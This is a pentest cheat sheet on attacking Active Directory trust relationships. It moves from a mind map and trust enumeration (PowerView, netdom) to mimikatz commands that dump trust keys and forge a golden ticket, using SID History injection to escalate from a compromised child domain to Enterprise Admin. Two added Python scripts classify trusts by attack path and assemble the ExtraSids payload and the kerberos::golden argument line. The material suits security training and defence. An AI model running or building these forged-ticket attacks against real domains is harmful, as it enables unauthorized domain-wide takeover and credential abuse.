Domain Trust Attacks
Attacking trust relationships
Mind Map

```mermaid
graph TD
A[Enumerate Trusts] --> B[Get-DomainTrust]
B --> C{Trust Type}
C --> D[Parent-Child]
C --> E[Forest Trust]
C --> F[External Trust]
D --> G[Compromise Child Domain]
G --> H[Get krbtgt Hash]
H --> I[Golden Ticket + SID History]
I --> J[Enterprise Admin Access]
E --> K[Check SID Filtering]
K -->|Disabled| I
K -->|Enabled| L[Limited Access]
F --> M[Credential Reuse Attack]
```
Quick Reference
Enumerate Trusts
```powershell
# PowerView
Get-DomainTrust          # Enumerate trusts of the current domain (type, direction, attributes)
Get-DomainTrustMapping   # Recursively follow trusts and map every reachable domain

# Native tool: netdom needs the "query ... trust" form to list trusts;
# "netdom trust" alone expects a trusting/trusted domain pair to verify
netdom query /domain:target.local trust   # List trusts of target.local
```
Trust Types
- Parent-Child: created automatically when a child domain joins a forest; two-way and transitive. SID filtering is not applied inside a forest, which is why the SID History path below works.
- Forest: between the root domains of two forests; transitive across both forests. SID filtering is enabled by default and must be checked (netdom trust ... /quarantine, /enablesidhistory).
- External: between two domains in different forests; non-transitive. SID filtering (quarantine) is enabled by default, so this branch usually comes down to credential reuse.
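The three categories above are not separate LDAP object types: they are bits in the trustAttributes field of each trustedDomain object, which is what Get-DomainTrust decodes. The following Python is an added example (not code from the page or from PowerView) that classifies constructed trust records the way the mind map branches on them and reports the SID-filtering state each bit pattern implies; the sample records and domain names are made up, and the attack-path labels are a simplified summary rather than a reimplementation of the KDC's filtering logic.

```python
"""Decode Active Directory trustedDomain records (the data PowerView's
Get-DomainTrust reads over LDAP) into trust type and SID-filtering state.
Added example; all records below are constructed, not taken from a directory."""

# trustAttributes bit values (MS-ADTS 6.1.6.7.9)
TRUST_FLAGS = {
    "NON_TRANSITIVE": 0x1,
    "UPLEVEL_ONLY": 0x2,
    "QUARANTINED_DOMAIN": 0x4,   # SID filtering quarantine enabled
    "FOREST_TRANSITIVE": 0x8,    # forest trust
    "CROSS_ORGANIZATION": 0x10,
    "WITHIN_FOREST": 0x20,       # parent-child or tree-root trust
    "TREAT_AS_EXTERNAL": 0x40,   # forest trust relaxed to external-style filtering
    "USES_RC4_ENCRYPTION": 0x80,
}

# trustDirection values, relative to the domain that holds the object
DIRECTIONS = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}


def flag_names(attrs):
    """Human-readable flag list for a trustAttributes value."""
    return [name for name, bit in TRUST_FLAGS.items() if attrs & bit]


def trust_type(attrs):
    """Map the attribute bits onto the three categories used on this page."""
    if attrs & TRUST_FLAGS["WITHIN_FOREST"]:
        return "Parent-Child"        # intra-forest (also covers tree-root trusts)
    if attrs & TRUST_FLAGS["FOREST_TRANSITIVE"]:
        return "Forest"
    return "External"


def sid_filtering(attrs):
    """Describe how SIDHistory on incoming tickets is treated across this trust."""
    kind = trust_type(attrs)
    if kind == "Parent-Child":
        return "none"                # intra-forest trusts are never SID-filtered
    if attrs & TRUST_FLAGS["QUARANTINED_DOMAIN"]:
        return "quarantined"         # only SIDs from the trusted domain survive
    if kind == "Forest":
        if attrs & TRUST_FLAGS["TREAT_AS_EXTERNAL"]:
            return "relaxed"         # netdom /enablesidhistory:yes was used
        return "forest-aware"        # default: SIDs outside the trusted forest dropped
    return "disabled"                # external trust with quarantine turned off


def attack_path(attrs):
    """Which branch of the mind map applies (simplified summary)."""
    kind, filtering = trust_type(attrs), sid_filtering(attrs)
    if kind == "Parent-Child":
        return "Golden Ticket + SID History -> Enterprise Admin"
    if kind == "Forest":
        return "SID History possible, verify /quarantine" if filtering == "relaxed" else "Limited Access"
    return "Credential Reuse" if filtering == "quarantined" else "Credential Reuse / SID History"


def describe(record):
    attrs = record["trustAttributes"]
    return {
        "partner": record["trustPartner"],
        "direction": DIRECTIONS.get(record["trustDirection"], "Unknown"),
        "type": trust_type(attrs),
        "transitive": not (attrs & TRUST_FLAGS["NON_TRANSITIVE"]),
        "sid_filtering": sid_filtering(attrs),
        "flags": flag_names(attrs),
        "path": attack_path(attrs),
    }


def map_trusts(records):
    return [describe(r) for r in records]


# Constructed sample, as the forest root corp.local would see it (hypothetical names)
SAMPLE_TRUSTS = [
    {"trustPartner": "child.corp.local", "trustDirection": 3, "trustAttributes": 0x20},
    {"trustPartner": "partner.local",    "trustDirection": 3, "trustAttributes": 0x8},
    {"trustPartner": "vendor.local",     "trustDirection": 2, "trustAttributes": 0x8 | 0x40},
    {"trustPartner": "legacy.local",     "trustDirection": 1, "trustAttributes": 0x4 | 0x1},
]

if __name__ == "__main__":
    for t in map_trusts(SAMPLE_TRUSTS):
        print(f"{t['partner']:<18} {t['direction']:<14} {t['type']:<13} "
              f"filtering={t['sid_filtering']:<13} {t['path']}")
```

Feed it the trustPartner, trustDirection and trustAttributes values of real trustedDomain objects (ldapsearch or Get-DomainTrust -Raw) to reproduce the mapping; a Forest entry reported as forest-aware is the "Enabled" branch of the mind map, WITHIN_FOREST is the branch the rest of this page exploits.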
SID History Injection
```
# Dump the inter-realm trust keys (only needed if you forge the referral ticket itself)
mimikatz # lsadump::trust /patch

# Golden ticket for the compromised child domain with the parent's Enterprise Admins SID in SIDHistory
#   /sid    = SID of child.local           /sids = parent domain SID + RID 519
#   /krbtgt = NTLM hash of child.local's krbtgt account
mimikatz # kerberos::golden /user:admin /domain:child.local /sid:S-1-5-21-... /sids:S-1-5-21-...-519 /krbtgt:HASH /ptt
```

This is a child-domain TGT, not an inter-realm ticket: the parent's KDC accepts the injected SID because intra-forest trusts are not SID-filtered. The trust key from lsadump::trust is what you use instead of the krbtgt hash when forging the inter-realm referral ticket for the parent directly.
ExtraSids Attack
The /sids value is the SIDHistory injection payload: the parent (forest root) domain SID with the Enterprise Admins RID appended. Ticket shown above with the payload spelled out:

```
/sids:S-1-5-21-parent-519   # Enterprise Admins of the parent domain (replace "parent" with its SID)
```
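The two sections above (SID History Injection and ExtraSids) both come down to one string: the target group's SID, assembled from the parent domain SID and a well-known RID, and whether the receiving KDC's SID filtering keeps it. This added Python example (not code from the page or from mimikatz) builds the payload, validates the SID format, assembles the kerberos::golden argument line, and simulates the filtering outcome for the trust kinds listed under Trust Types. All SIDs and hashes below are constructed placeholders, and the filtering function is a simplified model of the rules rather than a reimplementation of LSASS.

```python
"""Build the ExtraSids payload for kerberos::golden and simulate what the
receiving DC's SID filtering would strip. Added example; all values are
constructed placeholders."""

import re

# domain SID, optionally followed by a RID
_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?$")

# Well-known RIDs worth injecting into SIDHistory
RID_DOMAIN_ADMINS = 512
RID_SCHEMA_ADMINS = 518
RID_ENTERPRISE_ADMINS = 519


def split_sid(sid):
    """Return (domain SID, RID or None); raises on anything that is not a domain SID."""
    m = _SID.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid = m.group(2)
    return m.group(1), (int(rid) if rid is not None else None)


def group_sid(domain_sid, rid):
    """Domain SID + RID, e.g. the parent's SID + 519 for Enterprise Admins."""
    domain, _ = split_sid(domain_sid)
    return f"{domain}-{rid}"


def golden_ticket_args(user, child_domain, child_sid, krbtgt_ntlm, extra_sids):
    """mimikatz kerberos::golden line for a child-domain TGT carrying extra SIDs."""
    split_sid(child_sid)
    for s in extra_sids:
        split_sid(s)
    return (f"kerberos::golden /user:{user} /domain:{child_domain} /sid:{child_sid} "
            f"/sids:{','.join(extra_sids)} /krbtgt:{krbtgt_ntlm} /ptt")


def apply_sid_filtering(extra_sids, mode, trusted_domain_sid, trusted_forest_sids=()):
    """Simulate SID filtering on SIDHistory arriving over a trust.

    mode: 'none'         intra-forest trust, everything is honored
          'quarantined'  only SIDs of the trusted domain itself survive
          'forest-aware' only SIDs of domains in the trusted forest survive
    Simplified model of the documented rules; not an LSASS reimplementation.
    """
    trusted_domain, _ = split_sid(trusted_domain_sid)
    forest = {split_sid(s)[0] for s in trusted_forest_sids} | {trusted_domain}
    kept = []
    for sid in extra_sids:
        domain, _ = split_sid(sid)
        if mode == "none":
            kept.append(sid)
        elif mode == "quarantined" and domain == trusted_domain:
            kept.append(sid)
        elif mode == "forest-aware" and domain in forest:
            kept.append(sid)
    return kept


if __name__ == "__main__":
    # Constructed placeholders: compromised child, its forest root, and a foreign forest
    CHILD = "S-1-5-21-1111111111-2222222222-3333333333"
    PARENT = "S-1-5-21-4444444444-5555555555-6666666666"
    OTHER = "S-1-5-21-7777777777-8888888888-9999999999"
    ea = group_sid(PARENT, RID_ENTERPRISE_ADMINS)
    print(golden_ticket_args("admin", "child.local", CHILD, "<krbtgt NTLM>", [ea]))
    print("parent-child :", apply_sid_filtering([ea], "none", CHILD))
    print("forest trust :", apply_sid_filtering([group_sid(OTHER, 519)], "forest-aware", CHILD, [PARENT]))
    print("external     :", apply_sid_filtering([group_sid(OTHER, 512)], "quarantined", CHILD))
```

The printed lines show the asymmetry the mind map draws: the parent's 519 survives the intra-forest hop, while a foreign forest's 512/519 is stripped on a quarantined or forest-aware trust, so only SIDs from your own side of that trust could ever be carried across it.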